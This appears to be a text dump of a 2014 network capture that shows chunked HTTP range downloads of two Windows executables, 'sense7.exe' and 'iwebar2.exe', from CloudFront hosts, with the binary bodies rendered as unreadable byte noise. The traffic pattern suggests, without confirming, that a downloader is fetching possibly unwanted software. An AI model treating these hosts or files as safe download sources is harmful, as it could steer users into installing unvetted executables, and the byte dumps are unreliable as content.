    .B...9....dp<K.2...\m....,...2.O...1.........XcH...IC.7H$. / ....{.
    U..... .E.....k..z.0.ug..2k...v....n.?.|.{'.0.....!....g6..y....;'o...
    F.]..w]...{4..m'... y"Agz........t).7...t..9....^.1..alxK.`.rW.)......
    ........P.C.B..w...G.k..).u....F.........Fc..!._^..........m..%..d

    <<< skipped >>>

    GET /sense7.exe HTTP/1.1

    Range: bytes=5000000-5249999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d26ccbexlraban.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Sat, 24 May 2014 17:14:53 GMT
    Last-Modified: Wed, 21 May 2014 11:17:01 GMT
    ETag: "9f45a4387401a9cf2cbd1707547b4ee1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 5000000-5249999/8693594
    Age: 4851
    X-Cache: Hit from cloudfront
    Via: 1.1 1d43f56d3213a63608863fd0e49585b9.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: fb_9xuHhQvndITbA2ZzsNrEsCFN5NZKktgMLh79qKD5q2_EJe3t9sg==
    .....}^:FP.....W..w.|a.a^.Q=..lcDTV...l..t..5.....=.....V..e.Z.-7..n..
    D`.t..C.p.O........?..eB.7%C...$./..1I.l.M..f.....^4H.....!0.......F..
    ..S.....:9Zr.......[d..tX"G.......g..w..@{>}.!MpljS.).*.j....wJ0O..
    ....32._..9K|z.....S..o...u/.X..j..h..y.E.o.N.!.......P.K.J.....R.L.'.
    l^.....]..|&..Xew1..G%.eg0Y...q..a].i.. .k3./........O...?....'0S.....
    L..a...|8#Fd.P~9n........,(.40W....])....5~Ab.Hsv...%F..l..).....(..p.
    z.u..s4. ....#.\v...5.|}.E6...;.._.-....s.5.?WI.`S.:.qk...~s.j.'bmA.%"
    1<.4$.(..t1....7-...L.ab`.8..l.9N.......CMHB.<...,."B;.<.F.{.
    "$).\..>6f.......F..Y.kO...t.v........9=!(.e.:f..x....f*....[.V....
    ...`..s.J=.....V...J08.'...=[..C....L.@...=L.......y.G&b.........[..~.
    ..._/.......f...ml=C...<e3...1....qG..0.E9~.y.io....M#....M.h......
    .....w....p....U[j.W...Q..........r....|..!....>...o...w.....97...c
    ..>...N#u).2..%.wRA zV.RY.Mz.%Vsp........7.......j.;.X.p.......H.U.
    ...h.F=.;..D,.A...Y....\z!.&...........n.D..o.A.....>...hV...Y.t.L9
    ..k....`^&M......z."....../k....%<..h.5G$M ;.I.1...>X.m......qR.
    ..*.M..KBn.3..yJ.............yX..fI.Y.(x9_h.O._e.h../g.....a..A..6u...
    ...q\..)......zMc.^........y.......L.-<l..2....|..o.i. u.....d.S.x.
    ..@..@.. ..oO...T..,..K.^[email protected].;.0.%.4.i.......`.,... ..
    w\7V`..[.ro.i.I..S.>..<2.u.M2Qei....vT.....k.........Sts..! .;d.
    .~.......}.%r..tOR.r..O...XE...i.zC.eC...........j.....t.!. ....K. d`.
    W.#>..nE.<..h..|..\.. A..%.'M......3eOI}.,./.U.._.......u...S(..
    -.-t!.sY.{..gK7.6.<5.W:..g,.83.>.a....t$.e/Q.:..G;..`...3a.1

    <<< skipped >>>

    GET /sense7.exe HTTP/1.1

    Range: bytes=5500000-5749999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d26ccbexlraban.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Sat, 24 May 2014 17:14:53 GMT
    Last-Modified: Wed, 21 May 2014 11:17:01 GMT
    ETag: "9f45a4387401a9cf2cbd1707547b4ee1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 5500000-5749999/8693594
    Age: 4854
    X-Cache: Hit from cloudfront
    Via: 1.1 1d43f56d3213a63608863fd0e49585b9.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: 7xxPAmFBYcFUZErB7JGulE-078vFbe-WObiySTVk2H5NjyzT8EHigQ==
    m..B&.?B..v(...(..Y...R.c...C........t.o..2iDt....c....=..D..CeY.u..@.
    ....C.o.%...../..bf.k.P..K.VCUB. ...G...>..d..F!h#...q....|......f:
    .A....._.....=.f...h.3...q.......=.Q....l...d..xI|..X.@.{E(..e.M...8..
    ..........S....8Z...v.....}O..T.z.......B.%F&......".O.....`...(.X[.9.
    ..U......2.:.0Y.%...t.......}.Qu..RI.o.rOX.M.V.*..`y....y..KDz#...wf..
    jSU..nH...oV".f..I._..........{..?>g..m......J....D.aj.`..I...1.ZG.
    ~;.-.4.H6i.q.....^v.bl&Y.....%....b....#wVE.C.z...QIV.7{..!y...r....8.
    I...!].E.x{O|..D......!...c-.s[<...\....q...U.R].....J.....~..L...@
    .....N..k..... z.:..c....3........%.j.....4......; /...D.I...bO\...@..
    ..=p......(\........S...SjtA:.Hc...^.m.0..2..t.@|w..>J.....o.....X.
    .....z..-MD[..\..A .. / ..C....Y.1..s..9L....L..O........i.../..U.=..;
    .%x.$.{.A|..u<b..RYkJ.&X~...t.........!.~r...g.4s.~9U.v.venH^....0d
    ....u.=...Cg..k..fj....d.T............}[email protected]...{[email protected]./
    .H....t.EE.z`9W.r..v.......v....<.R..Nlm......)..F.FEO7.E.67..%..Cr
    .9_..E.j...V..Cg.....g..x.a.g8....XW.....$.Pw... .;.F.n...~1\.^..D....
    G.(.*KK."..B.=..Ur..:.....^$.V.'aG......n-a.X.....F.5/.....]..Q......N
    ...QN...t........v#.*...#...Y ..^;?Vi`......0NVE>[email protected].....
    .(....Ys&K..%....G.e6.8...1N...}0L.8.g..{i..FUK..%S.W)A....s..L.G:....
    .I.j4.-..Y1C..T...u5.@`.*..*.5...........)...G1................&......
    1.Y3.>....a;.>'..o.E........iG[.....hS...ubq....P._.Bk....b.V.x.
    qr......z.<.9HK...O.I?.....m...&..y.M}...#.....~..?..".?.^s.H..C.;.
    ..5.8..~..}.s......r....?w\....F.L....^..q....DO....BY....... 'Y..

    <<< skipped >>>

    GET /sense7.exe HTTP/1.1

    Range: bytes=6250000-6499999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d26ccbexlraban.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Sat, 24 May 2014 17:14:53 GMT
    Last-Modified: Wed, 21 May 2014 11:17:01 GMT
    ETag: "9f45a4387401a9cf2cbd1707547b4ee1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 6250000-6499999/8693594
    Age: 4856
    X-Cache: Hit from cloudfront
    Via: 1.1 1d43f56d3213a63608863fd0e49585b9.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: 9gaFCqr-G3K5yZUX4lPxC-Y8mZC5MyYeyO31vwwqu-4Bq_1epsEy4Q==
    ......^..bo......._...IrZ.%.K.&L.3X.`U.iS..|O'w...co......t..G..a.....
    .9..G.'>....-....%....6........$.3....j.0qk..@..;..\.uk.....4.. U.,
    ..u.E.g..S.d.-.f.%.0...X../F...K.]c.b.....ns.9.7.Y.$....j..F.Z..'.D.c[
    .*.....MI..1.............).<..?...vVGm..[.@q`T.Cp..}D.p.b!6`....M..
    d.....{]...N..L=}.I.?u....a.?.*b,..e... *.,...?|B...............M..Y,.
    ......D...^.1./[email protected]....."...NE.U.._.......N..i&J
    ...t."9..W{......M[..fI........e.c........V.....:)..k..oT........s..8.
    8.n.!t..fp@=e.z..W...k..5...RT.P..${..[o.w.n..78E.....O...>.W.].x..
    .Zg.}.2k.....-..*P....iE..J........?8w........e.........[z...b........
    [-..5....y.d.K....\..;............QY.U/n{.B.......0...!,H ..l..X:h6m.u
    .L...g[......A..1.....2<........ .......Q...^l(.QCM:....I./........
    ....R.........a...,5..n.[1.....w..d...FW&...j:./?.b......`..J.:...D...
    ...e,#nP.%.j.!.#...........R...<[email protected]............
    .....5E*...,tR..8Qh.1..."..........N.".0.1..0.V...5.....@Q}"...P\...%.
    ...bc.<..W~.y..Dr=..!..1e......N...X....."...o.....rf.......O.,...f
    ]..Q..,.([email protected],@.....V .<...J...J.....[...g..gw...R..l.......:
    ...1)...H?.yx..*...4....W,.]K.2.u..=M.$......I.......Qr.uX.,..."...C.L
    0.b...xV^..BV..S.UgB.Fh.....g...a........!j.r.........7.Cc>5..4_..7
    ..(C..}...........\.D=..........K.S.....J.DhDi......b.....'...S.t..U..
    . ,,p..X...l;..x....E.....$VR...[.{.q.U...O.(X..!....L.ZP.Z.^H .....?.
    .}.).X'.......E.}...X..yk8y.....pi.a.(..c...q...&E..d..N.m&.......Ua.H
    X...PfuyA..r..q............[...'.v...#.F.W#......%.Q.....Xm.E....i

    <<< skipped >>>

    GET /sense7.exe HTTP/1.1

    Range: bytes=6750000-6999999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d26ccbexlraban.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Sat, 24 May 2014 17:14:53 GMT
    Last-Modified: Wed, 21 May 2014 11:17:01 GMT
    ETag: "9f45a4387401a9cf2cbd1707547b4ee1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 6750000-6999999/8693594
    Age: 4859
    X-Cache: Hit from cloudfront
    Via: 1.1 1d43f56d3213a63608863fd0e49585b9.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: YHI066FaQHGeaxmzd0PWrXpf3h9uRqb4ik8IrfL6FuJLM31J4UrStw==
    .;.V..>xL@....).....]......j.}......wN^.d._g....;k..L.?.3.....5....
    e.-b-Y:A....24..|..Nw...kv....Dxb.........).~.].>....y.O.Q....W.Kj.
    ....-.u..Vg......../A.....1M......ka.4...U6....J...3g._.[.y..z=..c\ ..
    ::......mG.....1..O...k#q/........*.l...k..-*}..%.{F....U..c.x.....7
    ....-.k..N....^.........4N...0.K..[s.....:Q1_...)y.T.....[.......d.Pwe
    ....Oi..#..Og...!^...=UW.^........ ..Y..>.....1...n......M.......u[
    Q)...W...(...w..=Zc..\.a].../3\.M..tR..8)KN.]....... .r..<D.....p.
    .Y......X..;.C\Q,[email protected];..)O.....!....v^...WD..c8..~..6..l,......F..w..a
    `u.laW.c.s....b.y..W..:..b\. ..)s.0!..^>...`...e...4.....d. .:..&l
    t;^..l...{P.I...m;...*..b.cSp...i....p..4...w.......g..x7.|..__.t.....
    v...V....Z7..9.t...N.....zM`w........Q<..Q........\#..../.L.p`...l.
    Q...../....fKc..HUxoYq.|.#/.......9.........<h.jx......n........'U.
    .m8/..X........Z|..u. .O..m......>{>;...h.-..3.^.0.f.^.....5....
    .v..jue.o.......M...%...P.?.Y.0/.KS.~.s..G(n?..;'...3G....l...#.X.....
    ?..X..........R.....Do.....g:.T)..n..k.....HRpQ.....K.e..w.....$.P....
    ......yT..Nff..;.d...H_.GQ.l..4...w.0.. ....Q#. ....Z........|......*.
    .....v~?...#B6U....^ ...ut9..........%.;X..Y..K..#.JVP...Z{..({......
    ..Q.....~."1:......e...T......m.....F....._.$...~.E.....-.U...lC..Q&.h
    .!.......c...........v`ef..&.F....95..."..1?.*...W.{..^.h.DSDb....(W..
    ....,.'...*.......6....3\......B%..M.T9.r=j..d..t.;x...1.....I.i....F
    %.Bw...Z.m.<^z0.....V.....Wj..8..........8@.;.<..mb.Z.GMh.q.J..9
    ...W.O.LA...2f....3u..0.b.L.....]B..G...F..).....o..C.....pk.1p...

    <<< skipped >>>

    GET /sense7.exe HTTP/1.1

    Range: bytes=7250000-7499999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d26ccbexlraban.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Sat, 24 May 2014 17:14:53 GMT
    Last-Modified: Wed, 21 May 2014 11:17:01 GMT
    ETag: "9f45a4387401a9cf2cbd1707547b4ee1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 7250000-7499999/8693594
    Age: 4861
    X-Cache: Hit from cloudfront
    Via: 1.1 1d43f56d3213a63608863fd0e49585b9.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: taufT3eUYzX5kbvMFt60C-GSQwVEFYYQvlTiNcycFNXBGf_pEYFixg==
    z:....Ylfe..I[..B...8..u3...(..P.;. .f.....vX.V.=Kg.~`j.6....n.K..C...
    wT...*.P.t3.<>....UY...o.Z.....(<.O..h(H......"........O.T...
    ....._...i{...<[email protected]..!00*...#.;......Qe6."..q...q#..76f
    $..|.-.$R.?^..@C.,ZGrTG ........F.......^.)...n0....G].....<.[3.$.e
    ..f..%.z......b.{....<..l.....u_|X....T!`ND....)..l...}..........n.
    ......\....=M...u...'..G.. .,...,{?..E.......T&.7.8..."|....... ..l.N/
    .)3.o.S........@......>M...p@.......{.....>9..V..........oc..~Y=
    ......"..o.......1.jIYz.L...&.d.....I.S..*......w=....k3.]...J.5.t). .
    t../.....g^.....8J..c/.....~ [email protected]...".nn*.E.....M.R..y...q...;.5...-.8
    .).=4<oF..Wh.G...a.1<[email protected]..]f%....`...O...B........T...-.(.B:
    Z...6..j......3.?....G}.R...........I*[email protected]..&.....,"q.
    o.=....X.Z.[.dyh,. ....4J?.E.1...M|J.q..{.(V.)%.2,.'[email protected]{.
    ~.9..8.3..v8~<6tX........1..E...8..@'?(.......R.h?.U....9.2.P...r..
    |.....i#......B.......l..h..u.......0.Y......y....q.#..\".D..a......d^
    .....B.;q6V...26.J...bp....s.m..'}.`....a..&..[.......:1.....b.:{I...L
    "w.0.B..o!.2!.5.}../E...6V.. ..^).6).E.&...AO.."{L...r.n.\..../.|"..^w
    lWaW....D...^..O.Pe.N_...Qj.4..I.......U..&.E.......w.".c.j....A<f.
    *...:..~$N.)[email protected];)...<.H..........Y.q.`S.Y.....-.."[.`=K.8..
    .....*....Q......S.......O.v........6Dn....*...!....X..`l..D..3.....'.
    .-.....]f.......z.*R}...cU...S.....X....`.ua.d........z...05....W.....
    .9...W.5.z...D...(.L........`g&..3...k.."T.. g8./...........x?..`ZF.a.
    .9.`.W"u.......4....$W..n'.W..O.5=.{./ux!6DUf...Sj..y...?....V~.&g

    <<< skipped >>>

    GET /sense7.exe HTTP/1.1

    Range: bytes=7750000-7999999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d26ccbexlraban.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Sat, 24 May 2014 17:14:53 GMT
    Last-Modified: Wed, 21 May 2014 11:17:01 GMT
    ETag: "9f45a4387401a9cf2cbd1707547b4ee1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 7750000-7999999/8693594
    Age: 4862
    X-Cache: Hit from cloudfront
    Via: 1.1 1d43f56d3213a63608863fd0e49585b9.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: ruXoXM0BAdRfQjz3PW_YvGiKi77gnbI766omjjL3yd_nQDroXnq6tg==
    G8.....de.........;`......W8.~d!..........T.y^...p..4...... ..\.......
    z..B..^._..O..........Q...J^u...0.....f....J.u..E............i.f[..(..
    ....&.{f.Y.6{...OE..g.....'.X.!-./[email protected]{.....L...L.o.d**...J.
    ..%....5Ve.S.......K.2....m8[..5..?(E...?.zq.1[R...s^.us.'......0..F..
    dT.4R.U{......vd!..{..n...o.....b..e*=..O..........(. a.....{_..F.....
    H.......yu...|...,\[email protected].}..T.8..7..eu6.an....t.....#..^}.....
    .........F6{..&....z.......P.|.&...F....x./....v#..{...e....4.....Q.1.
    .\.;.h..1./>".E...*.o.X.... d..n.S....2`\..<.@...!.....R'......L
    !...a...p..~zgx.|F....$u.........J. ......:....D.r..?d....I1):....s...
    ..3..,b.....8!.DI8.....C..z.^P..{..?f..E..k..a.T..7..^.Q..Fs....8X...&
    ....q...Kh...#.Nc...hh).J..9Ugq....G....L......o..s3.U..4|.>*%.l..S
    g.qm.....~.".i../Y9.....E...<.8..s....V.{....w...E9...0k,>D.....
    ?0>)A....6`..Y.gh..Z...k.zf.h....k....F.Q...aY_...X...2.s....l...p.
    .fq_n......wW[..2....u.&.0n.....w...i.~.I...EhV...Rs[...m..lS}{mB.....
    .t...i.a.x..6..9.d...U,..oA...v........n\......?x....l....#o|".`...x..
    .....uV8....U.F...._v7 ~....F....j.L..i....tn......#..kP.x...w.....).H
    1.L..$TM;...'X.D.J;.>j....!'(...X..'Y...3.= .]TM.,..u...!.V".....C]
    ....9......f...)..F...(....3..g...<.GH....#....E.M.`.ypr..n.k.rN...
    '.TO.}.S@............. pa..S..F.p9ux.......e.7].}I..I....kaBb.0T.B>
    ..?#$.O.3....$.FG2a...b.v..q..K....V.m.&...C7..Q.........c=.C...2...]&
    gt;...;R..3../.S.a...Gb.,.....>......v).iXP...!%)RE.V...A...Rlpnc&g
    t;[email protected]...;.... ...]I.[.....N.....c.|&De.

    <<< skipped >>>

    GET /sense7.exe HTTP/1.1

    Range: bytes=8500000-8693593
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d26ccbexlraban.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 193594
    Connection: keep-alive
    Date: Sat, 24 May 2014 17:14:53 GMT
    Last-Modified: Wed, 21 May 2014 11:17:01 GMT
    ETag: "9f45a4387401a9cf2cbd1707547b4ee1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 8500000-8693593/8693594
    Age: 4866
    X-Cache: Hit from cloudfront
    Via: 1.1 1d43f56d3213a63608863fd0e49585b9.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: shjF5PmwskZSCUxtVa3FCkb8HHNSlpgzl-LmVDRaGNYgIpSYN65jKQ==
    . .....lX.}.....5..L(`....e.KM.).........?w.p&...iW.u9ic.I.TF.S..k4..E
    .O-.q...K....!..U.9T......-.... .. i...{=HBq........q.v...(...]....P..
    /.5U....D6g...!..9...`{....G.m0./OA.....u..Z.^P5.Z.o.x~.X..C.n.......[
    E......KbC %... .....2........Y...*...Z.......t........}..m`.....J>
    ..\.J`..{.G..1..W.Kp..................2.....w...n.......(.....\2./i.x.
    [email protected]@.(F.W..o...2.........r$~...A{........X1r
    .Je...cmr.....C.a\..A..U.;..SEf.KFO......y..o........F.UBI.3z.|F.Z..-.
    q`..SZ....,....]..yGHB6.H_..2......7.A.Rc.q.&... O..,.../........i.Y..
    N...(...M[}...K..%5.%...K.......{I....E...$-T.G....m....>Y......z..
    ...w8}.......[4".T.fb3...6Q\T..Gz.....p...s..U.=.......)^$*)..s.....#.
    %..r*.^..pZ.....4...$ck.I.u..;@....:....C@.. .|.M......&APt.\.a..... .
    .Ui3.n!...7............F3...2.......%...:m.._...*.t.;...m....@..\.!1/.
    .F.:.....}u.&_..N.&.}..-].9Jp..T]....m^...cE.L....e\.H.[R...'>S/M..
    F.......K...!U.'.L..........a...Mx...#.Hg....{*..u........Qo...c...\'.
    h.11...W..hE.....D.C....|..7......H2...;....-j......y.B....k...?h.D(.8
    ...f1.;..&...Pe'.<1...k.M.V.t.&.ZQ7j..S".......:..7..............=.
    ...4Y.8....1.>.8'..~...[.I.Pu.%.v=0.........X.!/K]..X.8le..II...%.S
    .. .....Je..q....z.......F.......'V.?..K..a .s51.W,..!.R..o.|..I.oQ8..
    $.....f..PR.......=T|....%ju......vM>....U8Y .G.*.r=.C 2C.. &N.o2d.
    ._..Ce.d.<N....1.<t.BC^..0U....B#`..v{q.... .Y........_.V...[T.r
    L.....e.!.^....[.. .M...>.~..$..r...L..R.F....j......w.X.b.......X.
    ..1.Y-.Jw.D.VQ.....W.;....{.'y>C......5..c.Nh........Gk4..4.2er

    <<< skipped >>>

    GET /iwebar2.exe HTTP/1.1
    Range: bytes=0-249999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d2y2rdikhrisqr.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:47:46 GMT
    Last-Modified: Wed, 21 May 2014 08:28:10 GMT
    ETag: "28dd656b64f5af0b40872a4124db9a3b"
    Accept-Ranges: bytes
    Server: AmazonS3
    Age: 21868
    Content-Range: bytes 0-249999/5974736
    X-Cache: Hit from cloudfront
    Via: 1.1 302732daa4ff2a8f50315b6b462b9c64.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: 2peFsyA8s1hTtofaTWUYq0LDw0IC1xnHIiJ7ZFpPtds8fBPLsb-f2A==
    MZ......................@.............................................
    ..!..L.!This program cannot be run in DOS mode....$.......PE..L......P
    .....................l......#[email protected]
    ........[....... ..........................................B..........
    `.[.p.................................................................
    ...........................text...@........................... .0`.dat
    [email protected]...#.......$................
    [email protected]@.bss..................................0..idata..................
    [email protected]... ....... [email protected]....
    [email protected].............................................
    ......................................................................
    ......................................................................
    ......................................................................
    ......................................................................
    ............................................U..WVS.......U..E....t...F
    .........;D..H...H.......M..E..5H;D..D$...$....D..M..E.....SS...E...$.
    D$... .D..M..E......M.WW......M.)..M..NT....NP........E.....}...VT....
    ....FP..E........}..VP........U.......FT.............}..........E..M..
    .$..|.D..E..R...D$..E..D$...$....D.....<$....D..E..Q.}.;}...Q....~X
    ........F4..$....D...W..........$.E......E......D$.........D.RR.FX..$.
    D$.....D..5..D.QQ..$.|$...RR...E...$..|....D$. ....D$..D$......D$..;D.
    ....D...|.......T$...$..QQ.<$....D.S.M..E..D$...$....D.PP1....D

    <<< skipped >>>

    GET /iwebar2.exe HTTP/1.1

    Range: bytes=500000-749999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d2y2rdikhrisqr.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:47:46 GMT
    Last-Modified: Wed, 21 May 2014 08:28:10 GMT
    ETag: "28dd656b64f5af0b40872a4124db9a3b"
    Accept-Ranges: bytes
    Server: AmazonS3
    Age: 21872
    Content-Range: bytes 500000-749999/5974736
    X-Cache: Hit from cloudfront
    Via: 1.1 302732daa4ff2a8f50315b6b462b9c64.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: lkS02Gkf-7Ekpkv5BscKCupCsNf-0Z3dptLlCM-vAmHJeMpGRohddg==
    .o.......%...k..rbv."......?..3.0?.$.e..B........e...Li.%2Z.].Y...3.8[
    .C......7......h$0<..;..:... ...&0.&.........:=#F.l......r..rX.d.e.
    ...9).:8y....!N...u...............3..O&..[8..a.....z..Rn.......`.....l
    ..!H...t}.W.S...............?_..S.....4.X.5..K...w7..(.........0...dY.
    ..<|Z.,...`..#.Z..u...j%..9.~I.=.......N..p..$y...`....A..\3 .f...7
    *.NS..1.c..{..S..Z...\../.T/L.....G9".m4....m..r7.Y... _r.!AX...I..'.
    .....#.O...q.=.;.....e.,.;.........T>U.........ZF.n: G...W1Q.......
    ..T.......z...>XyR.........=dL.k.*......v .....[.$ .y)..........|.
    "..1N.T......^......|..w%M.g.......O..t4..#...H..=.d...t.....43...j.$.
    %[email protected]{.p.(.....>.GA...E..(.....O/.bi.`7!'(...N.u.q....5.
    .E~.dA~.y..$D..>...S.|....b.......G...Y....&..y.......&..:9.t.C....
    _-.8{...4x..?<.)%......2.......=.;...y....iR.....n\.......L>t...
    =.w.'l......u..l=\-...IG....;..WN....../....5...|....1.:....K.F.../'.,
    [email protected].....;)7).>...Oasz.]/..........."@b.04.
    ...e\LyNn.W.b_;..6N...Q..x....w.........}[email protected]([email protected]. .v...-.~..g.
    L.9..g>...:..._...{.D....e.Y....J!.'=..Zv...k*...3^.....E.Z.X..G..$
    74....W..7f..(......N....*O.....ZX'.W7.{..2.^.}.^..."../.......K.S...J
    1.[.:..#{.5~..iEbbn.....=.......T..j^)5....Up....L...";.\..r.4...j>
    .C..e....2.N.g.M..<.. .h..O:.......h"pl..K.....\.%*NA.R.B.......%..
    n"(....DlD..... .. Xv....j..E.'R....o...E._2....1..........h.c...0..:b
    .........-..2...U.#p.$?2..k.......F(S..6..57.N..6.X..[.K.Ad.....|:[...
    .TD:G.....T.-.}o.Y_..6... 7.}..-.=C.....S..E.6...-X..t.*. ...i.._.

    <<< skipped >>>

    GET /iwebar2.exe HTTP/1.1

    Range: bytes=1000000-1249999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d2y2rdikhrisqr.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:47:46 GMT
    Last-Modified: Wed, 21 May 2014 08:28:10 GMT
    ETag: "28dd656b64f5af0b40872a4124db9a3b"
    Accept-Ranges: bytes
    Server: AmazonS3
    Age: 21876
    Content-Range: bytes 1000000-1249999/5974736
    X-Cache: Hit from cloudfront
    Via: 1.1 302732daa4ff2a8f50315b6b462b9c64.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: I7-bJlV6XBIf2ZGQ9rXFTijzaTjxRWevIuW9ZlYJuOfMR7K4FJSAyg==
    P...Pb...pE6"....A...%.~...z..y......e...@........)...;..H...v.P.U...H
    ...<!]!..%8..iFy8.:LP....W..6.....M0...wm.'I.Fb.*.W...#,..jAY......
    `.Z.....>z3..e....y.?.RZ|.ZD*.F.....>.k.<.1A.....%.K.*..|.j/.
    .8...#.?.K.......b..IV.W.! `:...7.....;..r.2..?...2b._..".......m#...Y
    {l...,,.........3...P..h.....|.G.B..-eV.9R..}..8....._.g.kq......)..'
    . ....Ak|O-.$t.....C.....{v.3A7..W.K0_.....-..'..........t....P,......
    .T.*......6.!Z...f..............J.?. 8a. ..bL..=.U ..5)4.H..&....y~=.E
    ...(.$.../x.....$.(.D...;..r..~~.w...................8q_4.;mh.d*^)...2
    .cr..$]..O......<..i.|.......i/#L..IQ....H...........D.......r([.B!
    ..v.V...`.9.m-.....~".5p....`..X=G.e9....k.V./.W A!WC..O8^a.9.....M..K
    .OP..|..AB./..N...W....v...(.................W^.=0.O..-}..Bo.l....?.r.
    @..a....yth1.c.3_..U_oj ...\b.....E.;A.6]n...)L..|._Jcz..k.)..........
    .?.n..0...j..2...l4^H.9..#..V...'c....Tj..c...u..~....f=W.....TV......
    [email protected].....(m.J/?.R......8,
    ...@;..O..{B.'...h...;.......l"R.o..Q...z.......y....}...j.K..-[!.....
    [email protected].(.. .C....qP.U..J.X.....S.....NcSj.3.....b]..
    ..,.....o..~.........)c.'.@........%...0 .(..1O................>W..
    b\..#..B.^E..q(8...u6.^......SEJ....&.....L..'.}"V..........3:.U...ea.
    ..I6).j...l...h..`V.|.2y........D.Z.:..)..oP....xr.P..w@...)....i.0B..
    ..&...k.....3...).n.'.f.'..../V...B,.o.. c.....q|...>..Qb.G0.#.1.?t
    ..."3v.tJ...{\5...W..H.B...Q..Pn.`$....^..`.........8I5m....Gar..X>
    ....5..VaP...........Z!.[}]..B...!....{o..3ta....c...a..=...4q....

    <<< skipped >>>

    GET /iwebar2.exe HTTP/1.1

    Range: bytes=1500000-1749999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d2y2rdikhrisqr.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 02 Jun 2014 12:47:46 GMT
    Last-Modified: Wed, 21 May 2014 08:28:10 GMT
    ETag: "28dd656b64f5af0b40872a4124db9a3b"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 1500000-1749999/5974736
    Age: 21881
    X-Cache: Hit from cloudfront
    Via: 1.1 302732daa4ff2a8f50315b6b462b9c64.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: QSDatOFfqpPxUbrfsQA9rjnEntIxmY32EfqloV878RZ_T02ttvUwhA==
    .. .3id..F6..?.......s....{.I...7....?.vy.|... >.!.b5.........Q..:.
    b.....6.._ .q.K.....%t.<...=..]...v..TB...2J. ...v..S_En.......*...
    .I....k..V......R[..&..........M...[K,..4...........j... #.K...".].*..
    .lh9.._.j......`....#...I.U....Y..*..".......'V.q..0v.).W...?.\xE..z.1
    h.._...CGh....&G.Z..!kf...n...."8lE)P2.{.Y..u..Ne..52s.S...ut..../....
    .....U....P.%.2.GDD.m..X.".d.F.AT.....#.fH.o.......wG...v.y.....O..\@.
    <..........-_*]....%.T'.5k{.A........!.......v...diM.../.....~Eb..X
    ..d....*..0..]..poz...U.."M...KE...p...}G....3M.Oh-....lp.30........i.
    .c..7G.....C.iowV*...d|8. .[5...\...i"*.-".h5........6.....O$..m..!.`.
    ....:C.......o...z....I5...........5.Y...E.....T2tsa?\........(.....;g
    ..2....2.W.{``.1~*^W.....6......E\..(..&s8..R.6.VQ[bL.".D...........$.
    8%8..../...C..B.....DU.......$.`Nx...]`.G.`@.g.U....W).D.S..F..W.....R
    .4.a*.m.].-..^.=^.4........Wm..M....mB<:%[email protected]
